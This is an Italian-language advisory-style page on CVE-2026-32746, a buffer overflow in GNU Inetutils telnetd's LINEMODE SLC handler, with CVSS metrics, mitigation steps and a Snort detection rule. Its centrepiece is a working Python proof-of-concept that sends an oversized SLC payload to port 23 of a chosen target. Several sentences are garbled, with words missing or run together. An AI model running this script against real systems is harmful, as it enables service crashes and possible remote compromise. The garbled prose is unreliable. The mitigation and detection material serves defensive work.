
Proof-of-concept exploit per CVE-2026-32746, una vulnerabilità critica di esecuzione remota di codice in GNU Inetutils telnetd tramite buffer overflow SLC in LINEMODE. Include analisi tecnica, metriche CVSS e indicazioni di mitigazione.
Vulnerabilità Critica | CVSS 9.8 | Esecuzione Remota di Codice!
Interessa: GNU Inetutils Telnetd (versioni precedenti alla 2.7)
Tipo: OOB Write nel gestore delle sotto-opzioni LINEMODE SLC
Vettore di Attacco: Rete (Porta 23) | Nessuna autenticazione richiesta
Impatto: RCE con privilegi del processo Telnetd
È stato identificato un overflow del buffer per scrittura fuori dai limiti (OOB Write) nella funzione add_slc del demone di . Questo difetto consente a un attaccante remoto di manipolando le del protocollo Telnet.
telnetdadd_slc (elaborazione dei caratteri locali).Un attaccante può sfruttare questa vulnerabilità tramite un payload Telnet maligno che satura il buffer interno:
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload generato per overflow di add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Ripetizione di 600 volte
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Invio del payload maligno a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload consegnato. Verifica del crash del servizio/RCE...")
⚠️ ¡AVVERTENZA! Questo codice è solo a scopo educativo e di ricerca. Il suo utilizzo su sistemi senza autorizzazione è illegale.
| Metrica | Valore | Descrizione |
|---|---|---|
| Vettore | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Remoto, senza autenticazione |
| Punteggio | 9.8 (CRITICO) 🔴 | Alto impatto su riservatezza, integrità e disponibilità |
| Pubblicazione | 13 marzo 2026 | Ultima modifica: 5 maggio 2026 |
✅ Aggiornare GNU Inetutils alla versione corretta (post-2.7).
🔹 Disabilitare telnetd e migrare a SSH (consigliato).
🔹 Bloccare la porta 23 nei firewall perimetrali.
🔹 Configurare IDS/IPS per rilevare sequenze LINEMODE SLC anomale.
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)